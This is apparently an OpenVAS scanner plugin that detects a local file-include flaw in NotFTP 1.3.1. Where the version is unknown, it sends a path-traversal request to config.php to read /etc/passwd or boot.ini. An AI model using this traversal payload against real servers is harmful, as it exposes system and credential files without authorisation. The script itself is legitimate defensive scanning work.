###############################################################################
# OpenVAS Vulnerability Test
# $Id: notftp_34636.nasl 3194 2009-04-24 18:04:08Z mime $
#
# NotFTP 'config.php' Local File Include Vulnerability
#
# Authors
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Michael Meyer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100161);
 script_bugtraq_id(34636);
 script_version ("1.0");

 script_name(english:"NotFTP 'config.php' Local File Include Vulnerability");
 desc["english"] = "

 Overview:
  NotFTP is prone to a local file-include vulnerability because it
  fails to properly sanitize user-supplied input.

  An attacker can exploit this vulnerability to view and execute
  arbitrary local files in the context of the webserver process. This
  may aid in further attacks.

  NotFTP 1.3.1 is vulnerable; other versions may also be affected.

 See also:
  http://www.securityfocus.com/bid/34636

 Risk factor : Medium";

 script_description(english:desc["english"]);
 script_summary(english:"Determine if NotFTP is vulnerable to Local File Include");
 script_category(ACT_GATHER_INFO);
 script_family(english:"Web application abuses");
 script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
 script_dependencie("notftp_detect.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("version_func.inc");

port = get_http_port(default:80);

if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);

if(!version = get_kb_item(string("www/", port, "/notftp")))exit(0);
if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0);

vers = matches[1];
dir  = matches[2];

if(!isnull(vers) && vers >!< "unknown") {

  if(version_is_equal(version: vers, test_version: "1.3.1")) {
    VULN = TRUE;
  }  

} else {  
# No version found, try to exploit.
  if(!isnull(dir)) {
    foreach file (make_list("etc/passwd", "boot.ini")) {
       url = string(dir, "/config.php?newlang=kacper&languages[kacper][file]=../../../../../../../../", file);
       req = http_get(item:url, port:port);
       buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
       if( buf == NULL )continue;
       display(buf);
       if(egrep(pattern:"(root:.*:0:[01]:|\[boot loader\])", string: buf))
       {    
  	  VULN = TRUE;
	  break;
       }
    }  
  }
}

if(VULN) {

  security_warning(port:port);
  exit(0);

}  

exit(0);
